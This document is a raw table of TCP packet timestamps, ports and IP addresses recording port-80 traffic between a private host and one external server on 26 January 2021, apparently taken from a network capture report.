Jan 26, 2021 19:45:11.004134893 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.053354979 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.053477049 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.053512096 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.053663015 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.053730965 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.102655888 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.102751017 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.102823019 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.103065968 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.103104115 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.103132010 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.152975082 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.153053999 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.153218985 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.153290987 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.153795958 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.202482939 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.202863932 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.202965975 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.203079939 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.203334093 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.203445911 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.252559900 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.256633043 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.307976961 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.308468103 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.319499016 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.319591999 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.357722998 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.357851982 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.372900963 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.373034954 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.408639908 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.408857107 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.460350990 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.462214947 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.511410952 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.511542082 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.511555910 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.511610031 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.511812925 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.511867046 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.560700893 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.560782909 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.560827971 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.560878992 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.561315060 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.561378002 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.610014915 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.610131025 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.659311056 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.659394026 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.671597004 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.671849012 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.721004009 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.721136093 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.721256018 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.721364975 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.770347118 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.770827055 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.770872116 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.770905972 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.821847916 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.821947098 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.822078943 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.822133064 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.822284937 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.822331905 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.871243954 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.871397972 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.871439934 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.871474981 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.871576071 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.871623993 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.920597076 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.920675039 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.920773983 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.920886040 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.920983076 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.921169996 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.970089912 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.970149040 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.970197916 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.970238924 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.970355988 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.970406055 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.020725965 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.020803928 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.021310091 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.021365881 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.021420002 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.021481991 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.074116945 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.074218035 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.125237942 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.125426054 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.181514025 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.181544065 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.181622982 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.181652069 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.230650902 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.230730057 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.230829000 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.230884075 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.231122971 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.231173992 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.280256033 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.280363083 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.280417919 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.280498028 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.281225920 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.281318903 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.329504013 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.329613924 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.378793955 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.378890991 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.391899109 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.391989946 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.441171885 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.441256046 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.441267967 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.441314936 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.490567923 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.490582943 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.490648985 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.540277004 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.540350914 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.540488005 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.540539026 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.540720940 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.540770054 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.590022087 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.590137005 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.590221882 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.590374947 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.590420961 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.590620995 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.639465094 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.639584064 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.639678955 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.639744043 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.639831066 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.639894009 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.690803051 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.690916061 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.690958023 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.690978050 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.691155910 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.691231012 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.740025997 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.740406990 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.740659952 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.740907907 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.740940094 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.740962029 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.790005922 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.790222883 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.841109991 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.842241049 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.855900049 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.856409073 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.891494036 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.891686916 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.905483961 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.905546904 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.941286087 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.941343069 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:12.990446091 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:12.990633965 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.039777040 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.039870024 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.039969921 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.040028095 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.040201902 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.040291071 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.088973045 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.089337111 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.089561939 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.089657068 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.089832067 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.140657902 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.140729904 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.189749956 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.189846039 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.238948107 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.239063025 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.239192963 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.239259005 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.288197041 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.288288116 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.288316011 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.288341045 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.288539886 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.289464951 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.341667891 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.342683077 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.342797041 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.342819929 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.342855930 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.342922926 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.393397093 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.393857956 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.393913984 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.393953085 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.394088030 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.394145012 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.445810080 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.446158886 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.446593046 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.446716070 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.446732044 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.446734905 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.495853901 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.496866941 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.546030998 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.546298027 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.560058117 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.560141087 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.595427036 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.595691919 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.610111952 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.610219955 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.646723986 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.646910906 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.696290970 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.696506023 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.746701956 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.746890068 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.746957064 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.747035980 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.747119904 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.747226000 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.798078060 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.798232079 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.798655987 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.798705101 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.798732042 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.798785925 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.850065947 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.850140095 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.899266005 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.899362087 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.948591948 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.948653936 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.948721886 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.948760033 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.997931957 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.997997046 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.998188972 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:13.998265982 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:13.998543978 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.047364950 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.047439098 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.047482014 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.047521114 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.047651052 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.048648119 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.097497940 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.097606897 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.097645044 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.097716093 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.100060940 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.100130081 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.146831989 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.146982908 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.149163961 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.149240971 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.264287949 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.264372110 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.315325975 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.315445900 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.364609957 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.364799023 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.364934921 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.365077019 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.413944960 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.414035082 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.414192915 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.414263010 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.463396072 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.463468075 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.463706017 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.463826895 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.514225960 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.514363050 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.514600039 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.514731884 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.564033985 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.564068079 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.564168930 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.564254999 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.564371109 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.613357067 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.613454103 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.613703012 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.614216089 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.614306927 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.614315987 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.663388968 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.665549994 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.714719057 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.714987993 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.728508949 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.731404066 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.765322924 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.765594959 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.782227993 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.782578945 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.816401005 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.816719055 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.866152048 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.867197990 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.916378975 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.916554928 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.916574955 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.916652918 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.916793108 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.917081118 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.967442989 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.967526913 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:14.967844963 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:14.989367008 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:15.038499117 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:15.151518106 CET	49769	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:15.246185064 CET	80	49769	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:15.268407106 CET	80	49769	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:15.268599987 CET	49769	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:15.268978119 CET	49769	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:15.317838907 CET	80	49769	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:18.094533920 CET	49781	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:18.095472097 CET	49782	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:18.143585920 CET	80	49781	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:18.143734932 CET	49781	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:18.144501925 CET	80	49782	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:18.144609928 CET	49782	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:18.147516012 CET	49781	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:18.237313032 CET	80	49781	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:18.537538052 CET	80	49781	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:18.537602901 CET	80	49781	45.138.24.6	192.168.2.7
